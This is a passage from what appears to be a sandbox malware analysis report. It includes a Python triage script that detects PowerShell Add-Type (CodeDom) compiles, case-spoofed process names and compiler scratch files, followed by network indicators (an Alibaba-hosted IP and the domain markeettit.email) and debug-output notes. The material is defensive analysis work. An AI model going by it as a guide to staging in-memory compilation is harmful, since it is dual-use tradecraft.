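             "cvtres.exe": "cvtres.exe", "excel.exe": "EXCEL.EXE"}

# Assumed file set of one .NET CodeDom C# compile in %TEMP% (the mechanism
# behind PowerShell's Add-Type): <stem>.cmdline and <stem>.0.cs are written by
# the caller, <stem>.out/.dll/.pdb by csc.exe. csc.exe and cvtres.exe also
# leave CSC<hex>.tmp / RES<hex>.tmp scratch files.
CODEDOM_SUFFIXES = (".0.cs", ".cmdline", ".out", ".dll", ".pdb")
COMPILER_TEMP = re.compile(r"^(CSC|RES)[0-9A-F]{1,8}\.tmp$", re.I)


def _basename(path):
    return path.rsplit("\\", 1)[-1]


def case_mismatched_processes(records):
    """Process names that equal a known image name only case-insensitively."""
    hits = set()
    for _pid, proc, _path in records:
        canon = CANONICAL.get(proc.lower())
        if canon is not None and proc != canon:
            hits.add(proc)
    return hits


def codedom_compile_sets(records):
    """Group %TEMP% artifacts by stem; keep stems that form a complete compile
    (source + cmdline from the caller and at least the output assembly)."""
    sets = defaultdict(lambda: {"artifacts": set(), "caller": None, "compiler": None})
    for pid, proc, path in records:
        if "\\temp\\" not in path.lower():
            continue
        name = _basename(path)
        for suf in CODEDOM_SUFFIXES:
            if name.lower().endswith(suf):
                entry = sets[name[:-len(suf)]]
                entry["artifacts"].add(suf)
                if suf in (".0.cs", ".cmdline"):
                    entry["caller"] = (pid, proc)
                else:
                    entry["compiler"] = (pid, proc)
                break
    return {stem: e for stem, e in sets.items()
            if {".0.cs", ".cmdline", ".dll"} <= e["artifacts"]}


def compiler_temp_files(records):
    """CSC*.tmp / RES*.tmp scratch files that corroborate a csc/cvtres run."""
    return [(pid, proc, _basename(path)) for pid, proc, path in records
            if COMPILER_TEMP.match(_basename(path))]


def triage(records):
    """Human-readable findings for the three checks above."""
    findings = []
    for proc in sorted(case_mismatched_processes(records)):
        findings.append(f"process name with non-canonical case: {proc}")
    for stem, e in codedom_compile_sets(records).items():
        findings.append(f"CodeDom compile '{stem}': source+cmdline by {e['caller']}, "
                        f"assembly by {e['compiler']}")
    for pid, proc, name in compiler_temp_files(records):
        findings.append(f"compiler scratch file {name} from {proc} (pid {pid})")
    return findings


if __name__ == "__main__":
    for line in triage(DROPPED):
        print(line)
```

The stem-grouping is what makes the check robust: a lone .dll in %TEMP% is common, but a .0.cs and .cmdline from one process followed by .out/.dll/.pdb with the same random stem from csc.exe is specific to a CodeDom compile. The same record format can be fed from any sandbox or EDR file-write log, not only this report.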

Network activity

HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

No HTTP requests.

Connections

PID | Process | IP | ASN | CN | Reputation
–– | –– | 47.91.88.223:443 | Alibaba (China) Technology Co., Ltd. | US | unknown

Note that the report records a connection to port 443 but no HTTP requests, so whatever was exchanged with this host went over TLS and its content is not visible here; the PID and process columns are also empty, so the connection cannot be tied to a specific process from this table alone.

DNS requests

Domain | IP | Reputation
markeettit.email | 47.91.88.223 | unknown

Threats

No threats detected.

Debug output strings

Process Message
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
(the same message was emitted 84 times)

-2147024774 is HRESULT 0x8007007A, i.e. HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER), raised inside the side-by-side isolation code while csc.exe starts up. It is routine compiler noise and not an indicator by itself; the interesting fact is that csc.exe ran at all, which the Dropped files section above explains.